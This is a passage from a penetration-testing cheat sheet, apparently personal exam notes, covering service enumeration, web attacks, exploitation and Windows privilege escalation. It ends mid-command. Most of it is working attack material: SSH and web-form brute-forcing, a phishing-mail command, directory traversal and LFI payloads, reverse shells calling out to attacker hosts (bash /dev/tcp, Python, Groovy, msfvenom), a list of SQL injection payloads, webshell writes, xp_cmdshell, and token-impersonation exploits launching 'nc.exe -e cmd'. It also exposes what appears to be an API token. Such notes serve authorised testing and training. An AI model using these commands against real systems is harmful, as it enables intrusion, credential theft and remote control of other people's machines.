| #Login 795 | ssh uname@IP #enter password in the prompt 796 | 797 | #id_rsa or id_ecdsa file 798 | chmod 600 id_rsa/id_ecdsa 799 | ssh uname@IP -i id_rsa/id_ecdsa #if it still asks for password, crack them using John 800 | 801 | #cracking id_rsa or id_ecdsa 802 | ssh2john id_ecdsa(or)id_rsa > hash 803 | john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash 804 | 805 | #bruteforce 806 | hydra -l uname -P passwords.txt ssh #'-L' for usernames list, '-l' for username and vice-versa 807 | hydra -L users.txt -P pass.txt ssh -s 2222 808 | hydra -l offsec -P /usr/share/seclists/Passwords/500-worst-passwords.txt ssh 809 | 810 | #check for vulnerabilities associated with the version identified. 811 | ``` 812 | 813 | ## SMB enumeration 814 | 815 | ```powershell 816 | sudo nbtscan -r 192.168.50.0/24 #IP or range can be provided 817 | 818 | #NSE scripts can be used 819 | locate .nse | grep smb 820 | nmap -p445 --script="name" $IP 821 | 822 | #In windows we can view like this 823 | net view \\ /all 824 | 825 | #crackmapexec 826 | crackmapexec smb 827 | crackmapexec smb 192.168.1.100 -u username -p password 828 | crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares 829 | crackmapexec smb 192.168.1.100 -u username -p password --users #lists users 830 | crackmapexec smb 192.168.1.100 -u username -p password --all #all information 831 | crackmapexec smb 192.168.1.100 -u username -p password -p 445 --shares #specific port 832 | crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain 833 | #Inplace of username and password, we can include usernames.txt and passwords.txt for password-spraying or bruteforcing. 834 | 835 | # Smbclient 836 | smbclient -L //IP #or try with 4 /'s 837 | smbclient //server/share 838 | smbclient //server/share -U 839 | smbclient //server/share -U domain/username 840 | 841 | #SMBmap 842 | smbmap -H 843 | smbmap -H -u -p 844 | smbmap -H -u -p -d 845 | smbmap -H -u -p -r 846 | 847 | #Within SMB session 848 | put #to upload file 849 | get #to download file 850 | ``` 851 | 852 | - Downloading shares made easy - if the folder consists of several files, they all be downloading by this. 853 | 854 | ```powershell 855 | mask "" 856 | recurse ON 857 | prompt OFF 858 | mget * 859 | ``` 860 | 861 | ## HTTP/S enumeration 862 | 863 | - Check with whatweb 'URL' 864 | - View source-code and identify any hidden content. If some image looks suspicious download and try to find hidden data in it. 865 | - Identify the version or CMS and check for active exploits. This can be done using Nmap and Wappalyzer. 866 | - check /robots.txt folder 867 | - Look for the hostname and add the relevant one to `/etc/hosts` file. 868 | - Directory and file discovery - Obtain any hidden files which may contain juicy information 869 | 870 | 871 | ```powershell 872 | dirbuster 873 | gobuster dir -u http://example.com -w /path/to/wordlist.txt 874 | python3 dirsearch.py -u http://example.com -w /path/to/wordlist.txt 875 | ``` 876 | 877 | - Vulnerability Scanning using nikto: `nikto -h ` 878 | - `HTTPS`SSL certificate inspection, this may reveal information like subdomains, usernames…etc 879 | - Default credentials, Identify the CMS or service and check for default credentials and test them out. 880 | - Bruteforce 881 | 882 | ```powershell 883 | hydra -L users.txt -P password.txt http-{post/get}-form "/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V 884 | # Use https-post-form mode for https, post or get can be obtained from Burpsuite. Also do capture the response for detailed info. 885 | 886 | #Bruteforce can also be done by Burpsuite but it's slow, prefer Hydra! 887 | ``` 888 | 889 | - if `cgi-bin` is present then do further fuzzing and obtain files like .sh or .pl 890 | - Check if other services like FTP/SMB or anyothers which has upload privileges are getting reflected on web. 891 | - API - Fuzz further and it can reveal some sensitive information 892 | 893 | ```powershell 894 | #identifying endpoints using gobuster 895 | gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern #pattern can be like {GOBUSTER}/v1 here v1 is just for example, it can be anything 896 | 897 | #obtaining info using curl 898 | curl -i http://192.168.50.16:5002/users/v1 899 | ``` 900 | 901 | - If there is any Input field check for **Remote Code execution** or **SQL Injection** 902 | - Check the URL, whether we can leverage **Local or Remote File Inclusion**. 903 | - Also check if there’s any file upload utility(also obtain the location it’s getting reflected) 904 | 905 | ### Wordpress 906 | 907 | ```powershell 908 | # basic usage 909 | wpscan --url "target" --verbose 910 | 911 | # enumerate vulnerable plugins, users, vulrenable themes, timthumbs 912 | wpscan --url "target" --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log 913 | 914 | # Add Wpscan API to get the details of vulnerabilties. 915 | wpscan --url http://alvida-eatery.org/ --api-token NjnoSGZkuWDve0fDjmmnUNb1ZnkRw6J2J1FvBsVLPkA 916 | 917 | #Accessing Wordpress shell 918 | http://10.10.67.245/retro/wp-admin/theme-editor.php?file=404.php&theme=90s-retro 919 | 920 | http://10.10.67.245/retro/wp-content/themes/90s-retro/404.php 921 | ``` 922 | 923 | ### Drupal 924 | 925 | ```bash 926 | droopescan scan drupal -u http://site 927 | ``` 928 | 929 | ### Joomla 930 | 931 | ```bash 932 | droopescan scan joomla --url http://site 933 | sudo python3 joomla-brute.py -u http://site/ -w passwords.txt -usr username #https://github.com/ajnik/joomla-bruteforce 934 | ``` 935 | 936 | ## DNS enumeration 937 | 938 | - Better use `Seclists` wordlists for better enumeration. [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) 939 | 940 | ```powershell 941 | host www.megacorpone.com 942 | host -t mx megacorpone.com 943 | host -t txt megacorpone.com 944 | 945 | for ip in $(cat list.txt); do host $ip.megacorpone.com; done #DNS Bruteforce 946 | for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" #bash bruteforcer to find domain name 947 | 948 | ## DNS Recon 949 | dnsrecon -d megacorpone.com -t std #standard recon 950 | dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provided list 951 | 952 | # DNS Bruteforce using dnsenum 953 | dnsenum megacorpone.com 954 | 955 | ## NSlookup, a gold mine 956 | nslookup mail.megacorptwo.com 957 | nslookup -type=TXT info.megacorptwo.com 192.168.50.151 #We are querying the information from a specific IP, here it is 192.168.50.151. This can be very useful 958 | ``` 959 | 960 | ## SMTP enumeration 961 | 962 | ```powershell 963 | nc -nv 25 #Version Detection 964 | smtp-user-enum -M VRFY -U username.txt -t # -M means mode, it can be RCPT, VRFY, EXPN 965 | 966 | #Sending emain with valid credentials, the below is an example for Phishing mail attack 967 | sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap 968 | ``` 969 | 970 | ## LDAP Enumeration 971 | 972 | ```powershell 973 | ldapsearch -x -H ldap://: # try on both ldap and ldaps, this is first command to run if you dont have any valid credentials. 974 | 975 | ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" 976 | ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" 977 | #CN name describes the info w're collecting 978 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" 979 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" 980 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" 981 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" 982 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" 983 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" 984 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" 985 | 986 | #windapsearch.py 987 | #for computers 988 | python3 windapsearch.py --dc-ip -u -p --computers 989 | 990 | #for groups 991 | python3 windapsearch.py --dc-ip -u -p --groups 992 | 993 | #for users 994 | python3 windapsearch.py --dc-ip -u -p --da 995 | 996 | #for privileged users 997 | python3 windapsearch.py --dc-ip -u -p --privileged-users 998 | ``` 999 | 1000 | ## NFS Enumeration 1001 | 1002 | ```powershell 1003 | nmap -sV --script=nfs-showmount 1004 | showmount -e 1005 | ``` 1006 | 1007 | ## SNMP Enumeration 1008 | 1009 | ```powershell 1010 | #Nmap UDP scan 1011 | sudo nmap -A -T4 -p- -sU -v -oN nmap-udpscan.txt 1012 | 1013 | snmpcheck -t -c public #Better version than snmpwalk as it displays more user friendly 1014 | 1015 | snmpwalk -c public -v1 -t 10 #Displays entire MIB tree, MIB Means Management Information Base 1016 | snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.25 #Windows User enumeration 1017 | snmpwalk -c public -v1 1.3.6.1.2.1.25.4.2.1.2 #Windows Processes enumeration 1018 | snmpwalk -c public -v1 1.3.6.1.2.1.25.6.3.1.2 #Installed software enumeraion 1019 | snmpwalk -c public -v1 1.3.6.1.2.1.6.13.1.3 #Opened TCP Ports 1020 | 1021 | #Windows MIB values 1022 | 1.3.6.1.2.1.25.1.6.0 - System Processes 1023 | 1.3.6.1.2.1.25.4.2.1.2 - Running Programs 1024 | 1.3.6.1.2.1.25.4.2.1.4 - Processes Path 1025 | 1.3.6.1.2.1.25.2.3.1.4 - Storage Units 1026 | 1.3.6.1.2.1.25.6.3.1.2 - Software Name 1027 | 1.3.6.1.4.1.77.1.2.25 - User Accounts 1028 | 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports 1029 | ``` 1030 | 1031 | ## RPC Enumeration 1032 | 1033 | ```powershell 1034 | rpcclient -U=user $IP 1035 | rpcclient -U="" $IP #Anonymous login 1036 | ##Commands within in RPCclient 1037 | srvinfo 1038 | enumdomusers #users 1039 | enumpriv #like "whoami /priv" 1040 | queryuser #detailed user info 1041 | getuserdompwinfo #password policy, get user-RID from previous command 1042 | lookupnames #SID of specified user 1043 | createdomuser #Creating a user 1044 | deletedomuser 1045 | enumdomains 1046 | enumdomgroups 1047 | querygroup #get rid from previous command 1048 | querydispinfo #description of all users 1049 | netshareenum #Share enumeration, this only comesup if the current user we're logged in has permissions 1050 | netshareenumall 1051 | lsaenumsid #SID of all users 1052 | ``` 1053 | 1054 | --- 1055 | 1056 | # Web Attacks 1057 | 1058 | 1062 | 1063 | ## Directory Traversal 1064 | 1065 | ```powershell 1066 | cat /etc/passwd #displaying content through absolute path 1067 | cat ../../../etc/passwd #relative path 1068 | 1069 | # if the pwd is /var/log/ then in order to view the /etc/passwd it will be like this 1070 | cat ../../etc/passwd 1071 | 1072 | #In web int should be exploited like this, find a parameters and test it out 1073 | http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 1074 | #check for id_rsa, id_ecdsa 1075 | #If the output is not getting formatted properly then, 1076 | curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 1077 | 1078 | #For windows 1079 | http://192.168.221.193:3000/public/plugins/alertlist/../../../../../../../../Users/install.txt #no need to provide drive 1080 | ``` 1081 | 1082 | - URL Encoding 1083 | 1084 | ```powershell 1085 | #Sometimes it doesn't show if we try path, then we need to encode them 1086 | curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 1087 | ``` 1088 | 1089 | - Wordpress 1090 | - Simple exploit: https://github.com/leonjza/wordpress-shell 1091 | 1092 | ## Local File Inclusion 1093 | 1094 | - Main difference between Directory traversal and this attack is, here we’re able to execute commands remotely. 1095 | 1096 | ```powershell 1097 | #At first we need 1098 | http://192.168.45.125/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami #we're passing a command here 1099 | 1100 | #Reverse shells 1101 | bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1" 1102 | #We can simply pass a reverse shell to the cmd parameter and obtain reverse-shell 1103 | bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 #encoded version of above reverse-shell 1104 | 1105 | #PHP wrapper 1106 | curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," 1107 | curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php 1108 | ``` 1109 | 1110 | - Remote file inclusion 1111 | 1112 | ```powershell 1113 | 1. Obtain a php shell 1114 | 2. host a file server 1115 | 3. 1116 | http://mountaindesserts.com/meteor/index.php?page=http://attacker-ip/simple-backdoor.php&cmd=ls 1117 | we can also host a php reverseshell and obtain shell. 1118 | ``` 1119 | 1120 | ## SQL Injection 1121 | 1122 | ```powershell 1123 | admin' or '1'='1 1124 | ' or '1'='1 1125 | " or "1"="1 1126 | " or "1"="1"-- 1127 | " or "1"="1"/* 1128 | " or "1"="1"# 1129 | " or 1=1 1130 | " or 1=1 -- 1131 | " or 1=1 - 1132 | " or 1=1-- 1133 | " or 1=1/* 1134 | " or 1=1# 1135 | " or 1=1- 1136 | ") or "1"="1 1137 | ") or "1"="1"-- 1138 | ") or "1"="1"/* 1139 | ") or "1"="1"# 1140 | ") or ("1"="1 1141 | ") or ("1"="1"-- 1142 | ") or ("1"="1"/* 1143 | ") or ("1"="1"# 1144 | ) or '1`='1- 1145 | ``` 1146 | 1147 | - Blind SQL Injection - This can be identified by Time-based SQLI 1148 | 1149 | ```powershell 1150 | #Application takes some time to reload, here it is 3 seconds 1151 | http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- // 1152 | ``` 1153 | 1154 | - Manual Code Execution 1155 | 1156 | ```powershell 1157 | kali> impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth #To login 1158 | EXECUTE sp_configure 'show advanced options', 1; 1159 | RECONFIGURE; 1160 | EXECUTE sp_configure 'xp_cmdshell', 1; 1161 | RECONFIGURE; 1162 | #Now we can run commands 1163 | EXECUTE xp_cmdshell 'whoami'; 1164 | 1165 | #Sometimes we may not have direct access to convert it to RCE from web, then follow below steps 1166 | ' UNION SELECT "", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- // #Writing into a new file 1167 | #Now we can exploit it 1168 | http://192.168.45.285/tmp/webshell.php?cmd=id #Command execution 1169 | ``` 1170 | 1171 | - SQLMap - Automated Code execution 1172 | 1173 | ```powershell 1174 | sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user #Testing on parameter names "user", we'll get confirmation 1175 | sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump #Dumping database 1176 | 1177 | #OS Shell 1178 | # Obtain the Post request from Burp suite and save it to post.txt 1179 | sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" #/var/www/html/tmp is the writable folder on target, hence we're writing there 1180 | 1181 | ``` 1182 | 1183 | --- 1184 | 1185 | # Exploitation 1186 | 1187 | ## Finding Exploits 1188 | 1189 | ### Searchsploit 1190 | 1191 | ```bash 1192 | searchsploit 1193 | searchsploit -m windows/remote/46697.py #Copies the exploit to the current location 1194 | ``` 1195 | 1196 | ## Reverse Shells 1197 | 1198 | ### Msfvenom 1199 | 1200 | ```powershell 1201 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe 1202 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe 1203 | 1204 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1205 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1206 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1207 | msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php 1208 | ``` 1209 | 1210 | ### One Liners 1211 | 1212 | ```powershell 1213 | bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 1214 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 1215 | & /dev/tcp/10.11.0.106/443 0>&1');?> 1216 | #For powershell use the encrypted tool that's in Tools folder 1217 | ``` 1218 | 1219 | 1223 | 1224 | ### Groovy reverse-shell 1225 | 1226 | - For Jenkins 1227 | 1228 | ```powershell 1229 | String host="localhost"; 1230 | int port=8044; 1231 | String cmd="cmd.exe"; 1232 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 1233 | ``` 1234 | 1235 | --- 1236 | 1237 | # Windows Privilege Escalation 1238 | 1239 | 1243 | 1244 | ## Manual Enumeration commands 1245 | 1246 | ```bash 1247 | #Groups we're part of 1248 | whoami /groups 1249 | 1250 | whoami /all #lists everything we own. 1251 | 1252 | #Starting, Restarting and Stopping services in Powershell 1253 | Start-Service 1254 | Stop-Service 1255 | Restart-Service 1256 | 1257 | #Powershell History 1258 | Get-History 1259 | (Get-PSReadlineOption).HistorySavePath #displays the path of consoleHost_history.txt 1260 | type C:\Users\sathvik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 1261 | 1262 | #Viewing installed execuatbles 1263 | Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 1264 | Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 1265 | 1266 | #Process Information 1267 | Get-Process 1268 | Get-Process | Select ProcessName,Path 1269 | 1270 | #Sensitive info in XAMPP Directory 1271 | Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue 1272 | Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue #this for a specific user 1273 | 1274 | #Service Information 1275 | Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} 1276 | ``` 1277 | 1278 | ## Automated Scripts 1279 | 1280 | ```bash 1281 | winpeas.exe 1282 | winpeas.bat 1283 | Jaws-enum.ps1 1284 | powerup.ps1 1285 | PrivescCheck.ps1 1286 | ``` 1287 | 1288 | ## Token Impersonation 1289 | 1290 | 1291 | 1292 | - Command to check `whoami /priv` 1293 | 1294 | ```powershell 1295 | #Printspoofer 1296 | PrintSpoofer.exe -i -c powershell.exe 1297 | PrintSpoofer.exe -c "nc.exe -e cmd" 1298 | 1299 | #RoguePotato 1300 | RoguePotato.exe -r -e "shell.exe" -l 9999 1301 | 1302 | #GodPotato 1303 | GodPotato.exe -cmd "cmd /c whoami" 1304 | GodPotato.exe -cmd "shell.exe" 1305 | 1306 | #JuicyPotatoNG 1307 | JuicyPotatoNG.exe -t * -p "shell.exe" -a 1308 | 1309 | #SharpEfsPotato 1310 | SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" 1311 | #writes whoami command to w.log file 1312 | ``` 1313 | 1314 | ## Services 1315 | 1316 | ### Binary Hijacking 1317 | 1318 | ```powershell 1319 | #Identify service from winpeas 1320 | icalcs "path" #F means full permission, we need to check we have full access on folder 1321 | sc qc #find binarypath variable 1322 | sc config